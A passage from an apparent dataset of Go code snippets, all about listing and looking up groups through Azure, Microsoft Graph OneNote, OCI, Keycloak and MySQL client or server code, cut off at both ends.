clients)\n\trequire.Contains(t, err.Error(), \"was not found\")\n}", "func (client WorkloadNetworksClient) ListVMGroupsPreparer(ctx context.Context, resourceGroupName string, privateCloudName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"privateCloudName\": autorest.Encode(\"path\", privateCloudName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-07-17-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AVS/privateClouds/{privateCloudName}/workloadNetworks/default/vmGroups\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (a *GroupsOnenoteNotebooksSectionGroupApiService) GroupsOnenoteNotebooksSectionGroupsListSectionGroups(ctx _context.Context, groupId string, notebookId string, sectionGroupId string, localVarOptionals *GroupsOnenoteNotebooksSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/notebooks({notebook-id})/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"notebook-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", notebookId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func NewListIdpGroupMappingsDefault(code int) *ListIdpGroupMappingsDefault {\n\treturn &ListIdpGroupMappingsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *GroupController) List(ctx *app.ListGroupContext) error {\n\t// GroupController_List: start_implement\n\n\tdataStore := &dal.DataStore{}\n\tdataStore.GetSession()\n\t// Close the session\n\tdefer dataStore.Close()\n\tdc := dal.NewDalGroup(dataStore)\n\n\tgroups, err := dc.FetchAll()\n\n\tif err != nil {\n\t\tctx.ResponseData.Service.LogError(\"InternalServerError\", \"req_id\", middleware.ContextRequestID(ctx), \"ctrl\", \"Group\", \"action\", \"List\", ctx.RequestData.Request.Method, ctx.RequestData.Request.URL, \"databaseError\", err.Error())\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := make(app.GwentapiGroupCollection, len(*groups))\n\n\tlastModified := time.Time{}\n\tfor i, group := range *groups {\n\t\tg, _ := factory.CreateGroup(&group)\n\n\t\tif lastModified.Before(group.Last_Modified) {\n\t\t\tlastModified = group.Last_Modified\n\t\t}\n\n\t\tres[i] = g\n\t}\n\n\t// GroupController_List: end_implement\n\thelpers.LastModified(ctx.ResponseData, lastModified)\n\tif ctx.IfModifiedSince != nil {\n\t\tif !helpers.IsModified(*ctx.IfModifiedSince, lastModified) {\n\t\t\treturn ctx.NotModified()\n\t\t}\n\t}\n\treturn ctx.OK(res)\n}", "func NewGetGroupMembersListV1NotFound() *GetGroupMembersListV1NotFound {\n\treturn &GetGroupMembersListV1NotFound{}\n}", "func NewErrGroupNotFound(groupUUID string) ErrGroupNotFound {\n\treturn ErrGroupNotFound{groupUUID: groupUUID}\n}", "func (l *GroupLookup) newKeyGroup(entries []groupKeyListElement) *groupKeyList {\n\tid := l.nextID\n\tl.nextID++\n\treturn &groupKeyList{\n\t\tid: id,\n\t\telements: entries,\n\t}\n}", "func (client IdentityClient) ListGroups(ctx context.Context, request ListGroupsRequest) (response ListGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListGroupsResponse\")\n\t}\n\treturn\n}", "func (a *Client) PublicListReasonGroups(params *PublicListReasonGroupsParams, authInfo runtime.ClientAuthInfoWriter) (*PublicListReasonGroupsOK, *PublicListReasonGroupsInternalServerError, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPublicListReasonGroupsParams()\n\t}\n\n\tif params.Context == nil {\n\t\tparams.Context = context.Background()\n\t}\n\n\tif params.RetryPolicy != nil {\n\t\tparams.SetHTTPClientTransport(params.RetryPolicy)\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"publicListReasonGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/reporting/v1/public/namespaces/{namespace}/reasonGroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &PublicListReasonGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tswitch v := result.(type) {\n\n\tcase *PublicListReasonGroupsOK:\n\t\treturn v, nil, nil\n\n\tcase *PublicListReasonGroupsInternalServerError:\n\t\treturn nil, v, nil\n\n\tdefault:\n\t\treturn nil, nil, fmt.Errorf(\"Unexpected Type %v\", reflect.TypeOf(v))\n\t}\n}", "func DefaultGroups(clusterName, addonName string) []string {\n\treturn []string{\n\t\tfmt.Sprintf(\"system:open-cluster-management:cluster:%s:addon:%s\", clusterName, addonName),\n\t\tfmt.Sprintf(\"system:open-cluster-management:addon:%s\", addonName),\n\t\t\"system:authenticated\",\n\t}\n}", "func (client DataControllersClient) ListInGroupPreparer(ctx context.Context, resourceGroupName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2019-07-24-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureData/dataControllers\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func NewGetUsergroupsGroupIDNotFound() *GetUsergroupsGroupIDNotFound {\n\treturn &GetUsergroupsGroupIDNotFound{}\n}", "func NewListGroupsForbidden() *ListGroupsForbidden {\n\treturn &ListGroupsForbidden{}\n}", "func NewGetNicsNotFound() *GetNicsNotFound {\n\treturn &GetNicsNotFound{}\n}", "func (a *GroupsOnenoteNotebooksSectionGroupApiService) GroupsOnenoteNotebooksListSectionGroups(ctx _context.Context, groupId string, notebookId string, localVarOptionals *GroupsOnenoteNotebooksListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/notebooks({notebook-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"notebook-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", notebookId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func GetDefaultGroups(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *DefaultGroupsState, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tvar resource DefaultGroups\n\terr := ctx.ReadResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewPcloudVolumegroupsGetNotFound() *PcloudVolumegroupsGetNotFound {\n\treturn &PcloudVolumegroupsGetNotFound{}\n}", "func NewGetCustomObjectDefinitionsByIDAttributeGroupsByIDNotFound() *GetCustomObjectDefinitionsByIDAttributeGroupsByIDNotFound {\n\treturn &GetCustomObjectDefinitionsByIDAttributeGroupsByIDNotFound{}\n}", "func NewGroups(filename string, bad BadLineHandler) (*HTGroup, error) {\n\thtGroup := HTGroup{\n\t\tfilePath: filename,\n\t}\n\treturn &htGroup, htGroup.ReloadGroups(bad)\n}", "func (db *MySQLDB) ListGroups(ctx context.Context, tenant *Tenant, request *helper.PageRequest) ([]*Group, *helper.Page, error) {\n\tfLog := mysqlLog.WithField(\"func\", \"ListGroups\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\tq := \"SELECT COUNT(*) AS CNT FROM HANSIP_GROUP\"\n\tret := make([]*Group, 0)\n\trow := db.instance.QueryRowContext(ctx, q)\n\tcount := 0\n\terr := row.Scan(&count)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ret, helper.NewPage(request, uint(count)), nil\n\t\t}\n\t\tfLog.Errorf(\"row.Scan got %s\", err.Error())\n\t\treturn nil, nil, &ErrDBScanError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tpage := helper.NewPage(request, uint(count))\n\tq = fmt.Sprintf(\"SELECT REC_ID, GROUP_NAME, GROUP_DOMAIN, DESCRIPTION FROM HANSIP_GROUP WHERE GROUP_DOMAIN=? ORDER BY GROUP_NAME %s LIMIT %d, %d\", request.Sort, page.OffsetStart, page.OffsetEnd-page.OffsetStart)\n\trows, err := db.instance.QueryContext(ctx, q, tenant.Domain)\n\tif err != nil {\n\t\tfLog.Errorf(\"db.instance.QueryContext got %s. SQL = %s\", err.Error(), q)\n\t\treturn nil, nil, &ErrDBQueryError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\tr := &Group{}\n\t\terr := rows.Scan(&r.RecID, &r.GroupName, &r.GroupDomain, &r.Description)\n\t\tif err != nil {\n\t\t\tfLog.Warnf(\"row.Scan got %s\", err.Error())\n\t\t\treturn nil, nil, &ErrDBScanError{\n\t\t\t\tWrapped: err,\n\t\t\t\tMessage: \"Error ListGroups\",\n\t\t\t\tSQL: q,\n\t\t\t}\n\t\t} else {\n\t\t\tret = append(ret, r)\n\t\t}\n\t}\n\treturn ret, page, nil\n}", "func NewListIdpGroupMappingsNotFound() *ListIdpGroupMappingsNotFound {\n\treturn &ListIdpGroupMappingsNotFound{}\n}", "func NewSetRoleGroupsNotFound() *SetRoleGroupsNotFound {\n\treturn &SetRoleGroupsNotFound{}\n}", "func ListUserGroup(w http.ResponseWriter, r *http.Request) {\n\tfLog := userMgmtLogger.WithField(\"func\", \"ListUserGroup\").WithField(\"RequestID\", r.Context().Value(constants.RequestID)).WithField(\"path\", r.URL.Path).WithField(\"method\", r.Method)\n\n\tiauthctx := r.Context().Value(constants.HansipAuthentication)\n\tif iauthctx == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusUnauthorized, \"You are not authorized to access this resource\", nil, nil)\n\t\treturn\n\t}\n\n\tparams, err := helper.ParsePathParams(fmt.Sprintf(\"%s/management/user/{userRecId}/groups\", apiPrefix), r.URL.Path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tuser, err := UserRepo.GetUserByRecID(r.Context(), params[\"userRecId\"])\n\tif err != nil {\n\t\tfLog.Errorf(\"UserRepo.GetUserByRecID got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusInternalServerError, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tif user == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusNotFound, fmt.Sprintf(\"User recid %s not found\", params[\"userRecId\"]), nil, nil)\n\t\treturn\n\t}\n\n\tpageRequest, err := helper.NewPageRequestFromRequest(r)\n\tif err != nil {\n\t\tfLog.Errorf(\"helper.NewPageRequestFromRequest got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusBadRequest, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tgroups, page, err := UserGroupRepo.ListUserGroupByUser(r.Context(), user, pageRequest)\n\tif err != nil {\n\t\tfLog.Errorf(\"UserGroupRepo.ListUserGroupByUser got %s\", err.Error())\n\t}\n\tsgroups := make([]*SimpleGroup, len(groups))\n\tfor k, v := range groups {\n\t\tsgroups[k] = &SimpleGroup{\n\t\t\tRecID: v.RecID,\n\t\t\tGroupName: v.GroupName,\n\t\t}\n\t}\n\tret := make(map[string]interface{})\n\tret[\"groups\"] = sgroups\n\tret[\"page\"] = page\n\thelper.WriteHTTPResponse(r.Context(), w, http.StatusOK, \"List of groups paginated\", nil, ret)\n}", "func NewGetGroupsByDisplayNameUsingGETUnauthorized() *GetGroupsByDisplayNameUsingGETUnauthorized {\n\treturn &GetGroupsByDisplayNameUsingGETUnauthorized{}\n}", "func NewListByReferenceNotFound(body *ListByReferenceNotFoundResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func NewAddServerGroupNotFound() *AddServerGroupNotFound {\n\treturn &AddServerGroupNotFound{}\n}", "func (s *GroupsService) List(ctx context.Context, opts *PagingOptions) (*GroupList, error) {\n\tquery := addPaging(url.Values{}, opts)\n\treq, err := s.Client.NewRequest(ctx, http.MethodGet, newURI(groupsURI), WithQuery(query))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\tres, resp, err := s.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\n\tif resp != nil && resp.StatusCode == http.StatusNotFound {\n\t\treturn nil, ErrNotFound\n\t}\n\n\tg := &GroupList{\n\t\tGroups: []*Group{},\n\t}\n\tif err := json.Unmarshal(res, g); err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed, unable to unmarshal repository list json: , %w\", err)\n\t}\n\n\tfor _, r := range g.GetGroups() {\n\t\tr.Session.set(resp)\n\t}\n\n\treturn g, nil\n}", "func NewGetIPAMvrfgroupNotFound() *GetIPAMvrfgroupNotFound {\n\treturn &GetIPAMvrfgroupNotFound{}\n}", "func NewGroup(dataframe *DataFrame, columns ...string) *Groups {\n\t// ret := &Groups{Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\tret := &Groups{Keys: []Keys{}, Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\n\treturn ret\n}", "func (a *GroupsOnenotePagesNotebookApiService) GroupsOnenotePagesParentNotebookSectionGroupsListSectionGroups(ctx _context.Context, groupId string, onenotePageId string, sectionGroupId string, localVarOptionals *GroupsOnenotePagesParentNotebookSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentNotebook/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, 